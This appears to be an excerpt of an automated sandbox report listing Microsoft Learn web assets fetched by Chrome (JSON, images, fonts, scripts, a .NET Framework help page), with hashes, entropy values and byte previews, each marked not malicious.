                                                                                                                                                                                                            Preview:{"brandLink":{"biName":"learn","displayName":"Learn","href":"/"},"featuredContent":[{"biName":"1-microsoft-learn-for-organizations","description":"Access curated resources to upskill your team and close skills gaps.","href":"/training/organizations/","supertitle":"Microsoft Learn for Organizations","title":"Boost your team\u0027s technical skills"}],"metadata":{"git_commit_id":"dab49ca79cb372010aeaec5e99463f6cec8df000"},"navCategories":[{"biName":"1-discover","panel":{"panelContent":[{"biName":"1-documentation","componentType":"header-panel-card","description":"In-depth articles on Microsoft developer tools and technologies","href":"/docs/","title":"Documentation"},{"biName":"2-training","componentType":"header-panel-card","description":"Personalized learning paths and courses","href":"/training/","title":"Training"},{"biName":"3-credentials","componentType":"header-panel-card","description":"Globally recognized, industry-endorsed credentials","href":"/credentials/","title":"Credential
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):35005
                                                                                                                                                                                                            Entropy (8bit):7.980061050467981
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:aHBEr/QXnbCgWotMq4AZZivq2/Qu0cEv1FjHBep6U0Z/68R:ahWqbTWiM7ACvdIdldhep4rR
                                                                                                                                                                                                            MD5:522037F008E03C9448AE0AAAF09E93CB
                                                                                                                                                                                                            SHA1:8A32997EAB79246BEED5A37DB0C92FBFB006BEF2
                                                                                                                                                                                                            SHA-256:983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
                                                                                                                                                                                                            SHA-512:643EC613B2E7BDBB2F61E1799C189B0E3392EA5AE10845EB0B1F1542A03569E886F4B54D5B38AF10E78DB49C71357108C94589474B181F6A4573B86CF2D6F0D8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/app-could-not-be-started.png
                                                                                                                                                                                                            Preview:.PNG........IHDR..............[.U....sRGB.........gAMA......a.....pHYs..........+.....RIDATx^..`........B hpwww(PJ....R.B.....K[j....@ H ..r:...].P._.`...K.ffg.v.ygf.TM.4.m...`.D".H$......"##..2e.X.t..Y".H$...d..PK.V".H$..uVm.,.H$.....b+.H$.I-#.V".H$.ZF..D".H$...[.D".Hj.)...D"..2Rl%..D".e..J$..DR.H..H$.....b+.H$..9..Neee.X,.B.\/.....o.b+.H$..9...q...EHU*....p.....=z....b.7.q..........N.. ....cUAX.9...m'_...2.`.g{...4.H.9.p.4...K ^.....`.|.n*..]..m..`W..W.H.~..|.^.a..K.6......_....K..w....9......^.....&...R....[...w..Ix=.:..^/..Epp0.5.....QRR...l....S.b.5.c.6...5..8.\....z...I......&.>....../.{.=...]'c......[.E`@Cg......Z.....c.f..,.y|,.{.o@.j..2..:.&l4.{.]Ll.N.0..b:b...g.n.........I...Ewc....[..,i`v......F...il|.c,{.-.....%BP.U........y.x....6..E2..n.W...J .*..`..r....F....#BCC......|.L&........O...'........\.....;...q.n$...7...ga..x....)..A...0.{1..'1../...+yRC...W.-..b..c0dDG...U[po....2eG.G.../.@........h.:.k?.......Q...
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):4897
                                                                                                                                                                                                            Entropy (8bit):4.8007377074457604
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:A0AIvEQ+KfZcbhaW9dp45qtAdflfDOFnymoLByzfwqrLvJ4QG63JkRJ+dRp8TJHr:dgQ+KfZcbhaWjp45qtAdflfDOFnNgByQ
                                                                                                                                                                                                            MD5:0E78F790402498FA57E649052DA01218
                                                                                                                                                                                                            SHA1:9ED4D0846DA5D66D44EE831920B141BBF60A0200
                                                                                                                                                                                                            SHA-256:73F3061A46EA8FD11D674FB21FEEEFE3753FC3A3ED77224E7F66A964C0420603
                                                                                                                                                                                                            SHA-512:B46E4B90E53C7DABC7208A6FDAE53F25BD70FCFBBEF03FFC64B1B5D1EB1C01C870A7309DF167246FCCD114B483038A64D7C46CA3B9FCB3779A77E42DB6967051
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            URL:https://learn.microsoft.com/en-us/content-nav/MSDocsHeader-DotNet.json?
                                                                                                                                                                                                            Preview:{"callToAction":{"primary":{"biName":"download-dotnet","href":"https://dotnet.microsoft.com/download","kind":"link","title":"Download .NET"}},"category":{"biName":"dotnet","href":"/dotnet/","kind":"link","title":".NET"},"items":[{"biName":"1-languages","items":[{"biName":"1-c-sharp","href":"/dotnet/csharp/","kind":"link","title":"C#"},{"biName":"2-f-sharp","href":"/dotnet/fsharp/","kind":"link","title":"F#"},{"biName":"3-visual-basic","href":"/dotnet/visual-basic/","kind":"link","title":"Visual Basic"}],"kind":"menu","title":"Languages"},{"biName":"2-features","items":[{"biName":"1-fundamental","href":"/dotnet/fundamentals/","kind":"link","title":"Fundamentals"},{"biName":"2-tools-and-diagnostics","href":"/dotnet/navigate/tools-diagnostics/","kind":"link","title":"Tools and diagnostics"},{"biName":"3-ai","items":[{"biName":"1-generative-ai","href":"/dotnet/ai/","kind":"link","title":"Generative AI"},{"biName":"2-mlnet","href":"/dotnet/machine-learning/","kind":"link","title":"ML.NET"}]
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:exported SGML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1173007
                                                                                                                                                                                                            Entropy (8bit):5.503893944397598
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24576:VMga+4IVzOjS1Jho1WXQFjTEr39/jHXzT:VMcVzOjS1Jho1WXQar39/bXzT
                                                                                                                                                                                                            MD5:2E00D51C98DBB338E81054F240E1DEB2
                                                                                                                                                                                                            SHA1:D33BAC6B041064AE4330DCC2D958EBE4C28EBE58
                                                                                                                                                                                                            SHA-256:300480069078B5892D2363A2B65E2DFBBF30FE5C80F83EDBFECF4610FD093862
                                                                                                                                                                                                            SHA-512:B6268D980CE9CB729C82DBA22F04FD592952B2A1AAB43079CA5330C68A86E72B0D232CE4070DB893A5054EE5C68325C92C9F1A33F868D61EBB35129E74FC7EF9
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:(function(){"use strict";var __webpack_modules__={351:function(t,e,r){var n,o=this&&this.__extends||(n=function(t,e){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var r in e)Object.prototype.hasOwnProperty.call(e,r)&&(t[r]=e[r])},n(t,e)},function(t,e){if("function"!=typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");function r(){this.constructor=t}n(t,e),t.prototype=null===e?Object.create(e):(r.prototype=e.prototype,new r)}),i=this&&this.__assign||function(){return i=Object.assign||function(t){for(var e,r=1,n=arguments.length;r<n;r++)for(var o in e=arguments[r])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t},i.apply(this,arguments)},s=this&&this.__read||function(t,e){var r="function"==typeof Symbol&&t[Symbol.iterator];if(!r)return t;var n,o,i=r.call(t),s=[];try{for(;(void 0===e||e-- >0)&&!(n=i.next()).done;)s.push(n.value)}catch(t){o={error:t}}finally
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1301x300, components 3
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):33370
                                                                                                                                                                                                            Entropy (8bit):7.973675198531228
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:ykeIpO37gQNPfG0sxFrlSvg0EliJBectySxPMmPOGTeou78:ykX0DP+TFgg3iJNyyfPO9N78
                                                                                                                                                                                                            MD5:6E78EE324E008296108BFCDECD77E318
                                                                                                                                                                                                            SHA1:F7C39EE02C65BCEB2C66AD2D7F45523FEB5AD156
                                                                                                                                                                                                            SHA-256:EB7A4FF0F8ED4C8A95B2183968B5A59F4058B177F580AE2D2BEF4595B6F6E092
                                                                                                                                                                                                            SHA-512:BCFFF936BCC46AB4120690CFF3AF93491080E13084EA2BCD8BCE1A2470EA86EB007D695AEF23B73E0B84CB3C7FBF351D025BE47EC5D232AB613A420074F8A448
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            URL:https://learn.microsoft.com/en-us/media/event-banners/banner-ignite-2024.jpg
                                                                                                                                                                                                            Preview:......JFIF..........................................................) .. )/'%'/9339GDG]]}............................................) .. )/'%'/9339GDG]]}......,....!..........6.....................................................................S..d+!XYd..Hb..1..IR.BA0.+!....$C...@I..bU.BH%.1K..A...%...1h.3.,..+0F!Z@....`..%!.o...._]..=......J./Uz.k..._m..}..,s.lV.ED...J...,..b.........Y....u...N..g......A*.$"3!h.~`>.....d+.,.a).Rb.*I...D,."...IXJ..$.A$BU...bA,.`Z.b..,c...KFf.0.B;.f..U.C ..V.X,e.,1t}.....k.:R..b.l....mt.....#..W...iY..d..#.HU$..1...GW%..d]..-.x.:.......&...o.......(h.+.)h..x.?.B....,.D$.0.R.Y.%.."B#E$.$..!..K)0.....X.X.,.1..3BHbAxX.....R.]...1..(..`..VX.2..L.s.......L....]xVU^..Q.v>.I......7I.fJ....+vJ.T0V..z.]....}.J..A...,.~?...+....]...y.|. .H..fFh..l.?.....Yd.IHJ.V...K..F....IS.H...%..K....X.....,C...f..F..$...+..8WdV!]..,.U..p!.A..|Vw.x_I.,$!!...i...2..7.l_...'....}.q..{..z.F........vm/.V.........9..F..dh..;..$..BT.G0O.G.......B.$RJ.Z,,.0%..
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (46884)
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1817143
                                                                                                                                                                                                            Entropy (8bit):5.501007973622959
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24576:aLX8PHFluFxBSB1DkCXWjfz8gEPPXL/tie:auHFluFxBSB1DkCXWjfz7EPPXztH
                                                                                                                                                                                                            MD5:F57E274AE8E8889C7516D3E53E3EB026
                                                                                                                                                                                                            SHA1:F8D21465C0C19051474BE6A4A681FA0B0D3FCC0C
                                                                                                                                                                                                            SHA-256:2A2198DDBDAEDD1E968C0A1A45F800765AAE703675E419E46F6E51E3E9729D01
                                                                                                                                                                                                            SHA-512:9A9B42F70E09D821B799B92CB6AC981236FCF190F0A467CA7F7D382E3BCA1BC1D71673D37CD7426499D24DFBC0B7A6D10676C0E3FB2B0292249A5ABAB78F23F4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:"use strict";(()=>{var hve=Object.create;var _T=Object.defineProperty;var E2=Object.getOwnPropertyDescriptor;var bve=Object.getOwnPropertyNames;var _ve=Object.getPrototypeOf,vve=Object.prototype.hasOwnProperty;var yve=(e,t,o)=>t in e?_T(e,t,{enumerable:!0,configurable:!0,writable:!0,value:o}):e[t]=o;var Ie=(e,t)=>()=>(t||e((t={exports:{}}).exports,t),t.exports);var xve=(e,t,o,n)=>{if(t&&typeof t=="object"||typeof t=="function")for(let r of bve(t))!vve.call(e,r)&&r!==o&&_T(e,r,{get:()=>t[r],enumerable:!(n=E2(t,r))||n.enumerable});return e};var Ya=(e,t,o)=>(o=e!=null?hve(_ve(e)):{},xve(t||!e||!e.__esModule?_T(o,"default",{value:e,enumerable:!0}):o,e));var U=(e,t,o,n)=>{for(var r=n>1?void 0:n?E2(t,o):t,s=e.length-1,i;s>=0;s--)(i=e[s])&&(r=(n?i(t,o,r):i(r))||r);return n&&r&&_T(t,o,r),r};var ji=(e,t,o)=>(yve(e,typeof t!="symbol"?t+"":t,o),o),yR=(e,t,o)=>{if(!t.has(e))throw TypeError("Cannot "+o)};var wt=(e,t,o)=>(yR(e,t,"read from private field"),o?o.call(e):t.get(e)),Bo=(e,t,o)=>{if(t.has(
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1432
                                                                                                                                                                                                            Entropy (8bit):4.986131881931089
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:TGAcSRrEV4YUmjiqIWD5bfD9yRSmkYR/stZLKvVqXRRlAfr6VXBAuU:Ti4IV4YUmjiqr9bfskAmZTXGfSXqh
                                                                                                                                                                                                            MD5:6B8763B76F400DC480450FD69072F215
                                                                                                                                                                                                            SHA1:6932907906AFCF8EAFA22154D8478106521BC9EE
                                                                                                                                                                                                            SHA-256:3FB84D357F0C9A66100570EDD62A04D0574C45E8A5209A3E6870FF22AF839DFC
                                                                                                                                                                                                            SHA-512:8A07EBB806A0BA8EF54B463BD6AF37C77A10C1FA38A57128FD90FCB2C16DF71CE697D4FE65C623E5C6054C5715975831C36861D5574F59DF28836D9BC2B0BC22
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:// ES5 script for back compat with unsupported browsers..!(function () {..'use strict';..// Keep in sync with environment/browser.ts..var supportedBrowser =...typeof Blob === 'function' &&...typeof PerformanceObserver === 'function' &&...typeof Intl === 'object' &&...typeof MutationObserver === 'function' &&...typeof URLSearchParams === 'function' &&...typeof WebSocket === 'function' &&...typeof IntersectionObserver === 'function' &&...typeof queueMicrotask === 'function' &&...typeof TextEncoder === 'function' &&...typeof TextDecoder === 'function' &&...typeof customElements === 'object' &&...typeof HTMLDetailsElement === 'function' &&...typeof AbortController === 'function' &&...typeof AbortSignal === 'function' &&...'entries' in FormData.prototype &&...'toggleAttribute' in Element.prototype &&...'replaceChildren' in Element.prototype &&...// ES2019...'fromEntries' in Object &&...'flatMap' in Array.prototype &&...'trimEnd' in String.prototype &&...// ES2020...'allSettled' in Promise &
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):1154
                                                                                                                                                                                                            Entropy (8bit):4.59126408969148
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:txFRuJpzYeGK+VS6ckNL2091JP/UcHc8oQJ1sUWMLc/jH6GbKqjHJIOHA:JsfcU6ckNL2091Z/U/YsUDM+GhS
                                                                                                                                                                                                            MD5:37258A983459AE1C2E4F1E551665F388
                                                                                                                                                                                                            SHA1:603A4E9115E613CC827206CF792C62AEB606C941
                                                                                                                                                                                                            SHA-256:8E34F3807B4BF495D8954E7229681DA8D0DD101DD6DDC2AD7F90CD2983802B44
                                                                                                                                                                                                            SHA-512:184CB63EF510143B0AF013F506411C917D68BB63F2CFA47EA2A42688FD4F55F3B820AF94F87083C24F48AACEE6A692199E185FC5C5CFBED5D70790454EED7F5C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            URL:https://learn.microsoft.com/en-us/media/logos/logo_net.svg
                                                                                                                                                                                                            Preview:<svg width="456" height="456" viewBox="0 0 456 456" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="456" height="456" fill="#512BD4"/>..<path d="M81.2738 291.333C78.0496 291.333 75.309 290.259 73.052 288.11C70.795 285.906 69.6665 283.289 69.6665 280.259C69.6665 277.173 70.795 274.529 73.052 272.325C75.309 270.121 78.0496 269.019 81.2738 269.019C84.5518 269.019 87.3193 270.121 89.5763 272.325C91.887 274.529 93.0424 277.173 93.0424 280.259C93.0424 283.289 91.887 285.906 89.5763 288.11C87.3193 290.259 84.5518 291.333 81.2738 291.333Z" fill="white"/>..<path d="M210.167 289.515H189.209L133.994 202.406C132.597 200.202 131.441 197.915 130.528 195.546H130.044C130.474 198.081 130.689 203.508 130.689 211.827V289.515H112.149V171H134.477L187.839 256.043C190.096 259.57 191.547 261.994 192.192 263.316H192.514C191.977 260.176 191.708 254.859 191.708 247.365V171H210.167V289.515Z" fill="white"/>..<path d="M300.449 289.515H235.561V171H297.87V187.695H254.746V221.249H294.485V237.861H254.746V
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 19696, version 1.0
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):19696
                                                                                                                                                                                                            Entropy (8bit):7.9898910353479335
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:37wfQhsuDSP36Elj0oScS8w3F1ZTt5JwtRGsh1SJR3YL0BeojRs8E:37Cms69owH3FPutReFYL+eods8E
                                                                                                                                                                                                            MD5:4D0BFEA9EBDA0657CEE433600ED087B6
                                                                                                                                                                                                            SHA1:F13C690B170D5BA6BE45DEDC576776CA79718D98
                                                                                                                                                                                                            SHA-256:67E7D8E61B9984289B6F3F476BBEB6CEB955BEC823243263CF1EE57D7DB7AE9A
                                                                                                                                                                                                            SHA-512:9136ADEC32F1D29A72A486B4604309AA8F9611663FA1E8D49079B67260B2B09CEFDC3852CF5C08CA9F5D8EA718A16DBD8D8120AC3164B0D1519D8EF8A19E4EA5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            URL:https://learn.microsoft.com/static/assets/0.4.028726178/styles/docons.a1ef6ef.34a85e0c.woff2
                                                                                                                                                                                                            Preview:wOF2......L........`..L..........................T.V..@........6.$........ ..y.......d^..Awp(......<.1..fE.......I......z-.*."YTZ.p.eMd.#..7.qY..Z.!..V...!......r...Z.;b........J....X..;.^...>UQ%U..CkT.....zKG.!\8%..>.b.4o4.t*..........3..C..?u....E.S$.:.....mfZ......... .Q...].y.*.@....m.tC.C6. ......37..,V...F.a...A.. .PQ".A...B...p...q..!QA.N..m.......(..........gv..L...5M&._..+@.U..k.....CU..@...._.9q{....B..C.dB.F.a......J_Jo..M..oR....m......r...U0...y!.@-.h7...z....e.....J+...-{.s..1...^...zM[~....Fy.';.V..*.=.%......"..H..w.9L..$.{d.j&..... K...P`.$.g....;.0..........T.v....j.0Ht..<. ...<\......Ol.|_U.+rmW..JK..".e<C ...q.?...B..l..Ni.....H....D..n@.......=c.f3.7........t...Z...}{....S;..KU.Ho.`....._?m....y...32l^.(..r..........Z...{U....W(......|.q..P.`,.YQ....-,c...g*F..=....."M.......sq....-....w(.e.K........^2e.3&.|,..4.TO..D].........W..W%j.._...nS.X.gE..3;2..:...Y..4j.-....c0A...U...p......d.M..6.L..b....O:[['wN.|49.......]
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (33148), with no line terminators
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):33148
                                                                                                                                                                                                            Entropy (8bit):4.917595394577667
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:FnvJOb4OLIch+KCnMet7NPXlJl+HjZjBTRdE0zIwHdZ4vNNpUjV8din4E9hLUuro:5hOEO8chkMet7pCjBfcHkWOzUuro
                                                                                                                                                                                                            MD5:C4DE3932AA578FA03847604F09660315
                                                                                                                                                                                                            SHA1:5EFBA9D7F437AF4786560559FBF162C4475AAD4F
                                                                                                                                                                                                            SHA-256:7683C2566CBF3C67F1A645891CC7B4DE7D143FE40E0271E106AB55E90EF9C5A8
                                                                                                                                                                                                            SHA-512:3DCA7F8C7C2997D473B2B80916F3E976167BA06300E915CB301DB2A024A826B9E8D3A60B6111835A5FB9A3273B4080D89351F664F9CC410C18B7F76327C326AE
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            URL:https://learn.microsoft.com/en-us/dotnet/framework/toc.json
                                                                                                                                                                                                            Preview:{"items":[{"href":"./","toc_title":".NET Framework documentation"},{"href":"get-started/overview","toc_title":"Overview of .NET Framework"},{"children":[{"href":"get-started/","toc_title":"Overview"},{"href":"get-started/out-of-band-releases","toc_title":"Out-of-band releases"},{"href":"get-started/system-requirements","toc_title":"System requirements"}],"toc_title":"Get started"},{"children":[{"href":"install/","toc_title":"Overview"},{"href":"install/guide-for-developers","toc_title":"For developers"},{"children":[{"href":"install/on-windows-11","toc_title":"Windows 11"},{"href":"install/on-windows-10","toc_title":"Windows 10 and Windows Server 2016"},{"href":"install/on-windows-8-1","toc_title":"Windows 8.1 and Windows Server 2012 R2"},{"href":"install/on-windows-8","toc_title":"Windows 8 and Windows Server 2012"},{"href":"install/on-server-2022","toc_title":"Windows Server 2022"},{"href":"install/on-server-2019","toc_title":"Windows Server 2019"}],"toc_title":"By OS version"},{"hre
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):35005
                                                                                                                                                                                                            Entropy (8bit):7.980061050467981
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:aHBEr/QXnbCgWotMq4AZZivq2/Qu0cEv1FjHBep6U0Z/68R:ahWqbTWiM7ACvdIdldhep4rR
                                                                                                                                                                                                            MD5:522037F008E03C9448AE0AAAF09E93CB
                                                                                                                                                                                                            SHA1:8A32997EAB79246BEED5A37DB0C92FBFB006BEF2
                                                                                                                                                                                                            SHA-256:983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
                                                                                                                                                                                                            SHA-512:643EC613B2E7BDBB2F61E1799C189B0E3392EA5AE10845EB0B1F1542A03569E886F4B54D5B38AF10E78DB49C71357108C94589474B181F6A4573B86CF2D6F0D8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:.PNG........IHDR..............[.U....sRGB.........gAMA......a.....pHYs..........+.....RIDATx^..`........B hpwww(PJ....R.B.....K[j....@ H ..r:...].P._.`...K.ffg.v.ygf.TM.4.m...`.D".H$......"##..2e.X.t..Y".H$...d..PK.V".H$..uVm.,.H$.....b+.H$.I-#.V".H$.ZF..D".H$...[.D".Hj.)...D"..2Rl%..D".e..J$..DR.H..H$.....b+.H$..9..Neee.X,.B.\/.....o.b+.H$..9...q...EHU*....p.....=z....b.7.q..........N.. ....cUAX.9...m'_...2.`.g{...4.H.9.p.4...K ^.....`.|.n*..]..m..`W..W.H.~..|.^.a..K.6......_....K..w....9......^.....&...R....[...w..Ix=.:..^/..Epp0.5.....QRR...l....S.b.5.c.6...5..8.\....z...I......&.>....../.{.=...]'c......[.E`@Cg......Z.....c.f..,.y|,.{.o@.j..2..:.&l4.{.]Ll.N.0..b:b...g.n.........I...Ewc....[..,i`v......F...il|.c,{.-.....%BP.U........y.x....6..E2..n.W...J .*..`..r....F....#BCC......|.L&........O...'........\.....;...q.n$...7...ga..x....)..A...0.{1..'1../...+yRC...W.-..b..c0dDG...U[po....2eG.G.../.@........h.:.k?.......Q...
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):13842
                                                                                                                                                                                                            Entropy (8bit):7.802399161550213
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:NLNf+jBQsDHg7av3EEondO8PuRu2mIYXEIiDm42NpsHFMHfgnJ4K2DVwv:NLt+1jDmY+ndXwjLUpiDwpzfwoDVk
                                                                                                                                                                                                            MD5:F6EC97C43480D41695065AD55A97B382
                                                                                                                                                                                                            SHA1:D9C3D0895A5ED1A3951B8774B519B8217F0A54C5
                                                                                                                                                                                                            SHA-256:07A599FAB1E66BABC430E5FED3029F25FF3F4EA2DD0EC8968FFBA71EF1872F68
                                                                                                                                                                                                            SHA-512:22462763178409D60609761A2AF734F97B35B9A818EC1FD9046AFAB489AAD83CE34896EE8586EFE402EA7739ECF088BC2DB5C1C8E4FB39E6A0FC5B3ADC6B4A9B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:.PNG........IHDR................1....sRGB.........gAMA......a.....pHYs..........o.d..5.IDATx^..[.,.]...../<.!.B(/y..).F\r...!(.H..a ..B.~..A..KXA.M...6..8...!1....l./.X.1....2.`.y"l..R...V.....{...}._gWW.Z.VUw.N...U..P@..... ..@.A...".$..E.I.........$..("H..PD..... ..p....U.}.{.....l..A.....A........s.......D.0...@....E..x........L. /.".A.....$...Y."...%.I..["../.&.I..[`.0..IA.........p4.I.........$..("H..PD..... ..@.A...".$..E.I.........$..("H..PD..... ..@.A...".$..E.>H...O.................?.~.......].7.....a?....(H....m.G..G..a.P..?yo......f?...o. .B.....mo{[....:9<].....7.....a.....S..Cd.5,.R....#....>......._g.....Wo|.....z.g.........w.T...]x.>.....y(.........6....[..px...U....~.~hu...}H.......~.L... ....r...iY.$..Id..Ax"../....._..U....OTo|.Mh.km..A.k..k....n.C`|._\=...o...a.e.. ...&.A2..k.. ....X.+...C..P....y..>.{._..(H....8(.?...w.}M.........:s_!.m.........BY..T..z.5{.W.~..6.....F....bq....m.....?.......v....o..o...ki...iX.$......\]V...V...
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4897
                                                                                                                                                                                                            Entropy (8bit):4.8007377074457604
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:A0AIvEQ+KfZcbhaW9dp45qtAdflfDOFnymoLByzfwqrLvJ4QG63JkRJ+dRp8TJHr:dgQ+KfZcbhaWjp45qtAdflfDOFnNgByQ
                                                                                                                                                                                                            MD5:0E78F790402498FA57E649052DA01218
                                                                                                                                                                                                            SHA1:9ED4D0846DA5D66D44EE831920B141BBF60A0200
                                                                                                                                                                                                            SHA-256:73F3061A46EA8FD11D674FB21FEEEFE3753FC3A3ED77224E7F66A964C0420603
                                                                                                                                                                                                            SHA-512:B46E4B90E53C7DABC7208A6FDAE53F25BD70FCFBBEF03FFC64B1B5D1EB1C01C870A7309DF167246FCCD114B483038A64D7C46CA3B9FCB3779A77E42DB6967051
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:{"callToAction":{"primary":{"biName":"download-dotnet","href":"https://dotnet.microsoft.com/download","kind":"link","title":"Download .NET"}},"category":{"biName":"dotnet","href":"/dotnet/","kind":"link","title":".NET"},"items":[{"biName":"1-languages","items":[{"biName":"1-c-sharp","href":"/dotnet/csharp/","kind":"link","title":"C#"},{"biName":"2-f-sharp","href":"/dotnet/fsharp/","kind":"link","title":"F#"},{"biName":"3-visual-basic","href":"/dotnet/visual-basic/","kind":"link","title":"Visual Basic"}],"kind":"menu","title":"Languages"},{"biName":"2-features","items":[{"biName":"1-fundamental","href":"/dotnet/fundamentals/","kind":"link","title":"Fundamentals"},{"biName":"2-tools-and-diagnostics","href":"/dotnet/navigate/tools-diagnostics/","kind":"link","title":"Tools and diagnostics"},{"biName":"3-ai","items":[{"biName":"1-generative-ai","href":"/dotnet/ai/","kind":"link","title":"Generative AI"},{"biName":"2-mlnet","href":"/dotnet/machine-learning/","kind":"link","title":"ML.NET"}]
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (639), with CRLF, LF line terminators
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):47062
                                                                                                                                                                                                            Entropy (8bit):5.016115705165622
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:haAE16LIElO6L6x2bTI1ln4a1T0MCFnFMBVeZrdLg:hTAGLlO6eAbTIr4audZqBkZRLg
                                                                                                                                                                                                            MD5:B7BA0F1B4D3EE09BD4C1DD5EE8FA2633
                                                                                                                                                                                                            SHA1:A5725E0BD2E4DE3EB07E9C468306615CD0CE6955
                                                                                                                                                                                                            SHA-256:411BCF8F95DAF3C6D0BEBDFA4DDEFD0F947D2083C1A27BDD0E5D19BB6F299838
                                                                                                                                                                                                            SHA-512:59F535B445302E8A8398F02F7729D16236C629EB0967833257F8BA391A4E93B3A23A5FA3D64127EC117B8D93A6D7A9B86EBCB4B6E6F96CFF3B4DB3EE3C5F4844
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            URL:https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
